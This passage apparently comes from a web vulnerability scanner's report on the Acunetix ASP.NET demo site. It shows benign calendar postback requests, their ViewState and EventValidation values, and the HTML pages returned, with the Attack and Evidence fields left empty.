ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1099 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,099 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8404&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAd5%2Fm7doIZGRk3UAgzxsq%2BnzYlG60GJaWEWh7VrA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKxm4qfCwL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVeCvidEQGvNRDcZVzjmBJ3H0Pacw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:19 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBAd5/m7doIZGRk3UAgzxsq+nzYlG60GJaWEWh7VrA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKxm4qfCwL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gVeCvidEQGvNRDcZVzjmBJ3H0Pacw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:White" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8625&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAwjyQm9sIZGRku326mf8Em5Isu12sSuj9n4%2BLwEw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKxouzJCwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib%2FDwKo4Ib%2FDwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf%2BsAwLmnf%2BsAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna%2FQBgLmna%2FQBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk%2FAvukqT8C%2B6Td0wkC%2B6Td0wkC%2B6Tx9gIC%2B6Tx9gIC%2B6TljQoC%2B6TljQoC%2B6SZoAMC%2B6SZoAMC%2B6SNxwwC%2B6SNxwwC%2B6ThrAkC%2B6ThrAkC%2B6SVwwIC%2B6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbFJygZ5x%2FziXUeJ7VbGW%2FV%2BCloGQ%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:30 GMT Content-Length: 12556
Response Body - size: 12,556 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAzT8iktsIHgJTRBYBBgAAwjyQm9sIZGRku326mf8Em5Isu12sSuj9n4+LwEw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKxouzJCwKqztDzBAKN1YajAgKo4JLYBgKo4JLYBgKo4Ib/DwKo4Ib/DwKo4LqSBwKo4LqSBwKo4K4pAqjgrikCqODCzQkCqODCzQkCqOD24AICqOD24AICqODqhwoCqODqhwoCqODe7AgCqODe7AgCqODyAwKo4PIDAo333KgDAo333KgDAo338M8MAo338M8MAo335OIFAo335OIFAo33mLkNAo33mLkNAo33jNwGAo33jNwGAo33oPMPAo33oPMPAo331JcHAo331JcHAo33yCoCjffIKgKN97ySDQKN97ySDQKN99C2BgKN99C2BgLmnaPeCQLmnaPeCQLmndfyAgLmndfyAgLmncuJCgLmncuJCgLmnf+sAwLmnf+sAwLmnZPDDALmnZPDDALmnYfmBQLmnYfmBQLmnbu9DQLmnbu9DQLmna/QBgLmna/QBgLmnYO5AwLmnYO5AwLmnbfcDALmnbfcDAL7pIHFDwL7pIHFDwL7pLWYBwL7pLWYBwL7pKk/AvukqT8C+6Td0wkC+6Td0wkC+6Tx9gIC+6Tx9gIC+6TljQoC+6TljQoC+6SZoAMC+6SZoAMC+6SNxwwC+6SNxwwC+6ThrAkC+6ThrAkC+6SVwwIC+6SVwwIC3Mvn6AUC3Mvn6AUC3Mubjw0C3Mubjw0C3MuPogYC3MuPogbFJygZ5x/ziXUeJ7VbGW/V+CloGQ==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8644')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8618')" style="color:Black" title="August 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8619')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8620')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8621')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8622')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8623')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8624')" style="color:Black" title="August 12">12</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8625')" style="color:White" title="August 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8626')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8627')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8628')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8629')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8630')" style="color:Black" title="August 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8631')" style="color:Black" title="August 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8632')" style="color:Black" title="August 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8633')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8634')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8635')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8636')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8637')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8638')" style="color:Black" title="August 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8639')" style="color:Black" title="August 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8640')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8641')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8642')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8643')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8644')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8645')" style="color:Black" title="September 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8646')" style="color:Black" title="September 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8647')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8648')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8649')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8650')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8651')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8652')" style="color:Black" title="September 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
